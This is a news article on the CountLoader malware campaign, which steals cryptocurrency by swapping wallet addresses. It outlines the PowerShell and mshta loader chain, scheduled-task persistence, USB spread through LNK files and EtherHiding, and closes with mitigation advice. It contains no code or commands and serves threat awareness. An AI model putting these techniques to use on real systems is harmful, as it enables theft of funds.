A new wave of malware is covertly targeting cryptocurrency transactions worldwide, employing sophisticated methods to avoid detection. This campaign, identified by cybersecurity researchers, is centered on a complex multi-stage loader known as CountLoader, which collaborates with JavaScript, PowerShell, and shellcode to execute its malicious activities.
CountLoader’s Global Impact
The malware campaign has infected tens of thousands of machines across various continents. Researchers from McAfee Labs, who documented these findings, report that around 86,000 unique systems have been compromised. The infection predominantly affects India, Indonesia, and the United States, with significant activity throughout Southeast Asia.
The malware initiates its attack with a malicious executable file that triggers a PowerShell command. This command retrieves an obfuscated JavaScript loader, executed through the mshta.exe utility, which is commonly exploited due to its trusted status in Windows.
Techniques for Stealth and Spread
CountLoader employs multiple techniques to remain undetected. After the initial executable is run, a scheduled task is activated every 30 minutes to maintain persistence. The PowerShell script decodes a Base64 payload, executing it via Invoke-Expression, a method that obscures the code from being written to disk.
The malware also propagates through USB drives by replacing files with LNK shortcuts, enabling silent execution of the malware while appearing to open legitimate files. This method accounts for approximately 9,000 infections.
Cryptocurrency Clipper and EtherHiding Technique
At its core, the malware functions as a cryptocurrency clipper, monitoring clipboard activity to replace wallet addresses with those controlled by attackers, thus redirecting funds without user awareness. The final payload employs an innovative approach known as EtherHiding, locating its command server address through the Ethereum blockchain, making it resilient to takedowns.
Researchers assessed the campaign’s scope by commandeering a backup command-and-control domain, redirecting traffic to their server to observe the malware’s actions.
Users can mitigate risks by avoiding untrusted executable files, carefully managing USB drives, verifying wallet addresses before transactions, and maintaining updated security software.
In the face of evolving cyber threats, understanding and adapting to new attack methodologies is crucial for safeguarding digital assets.
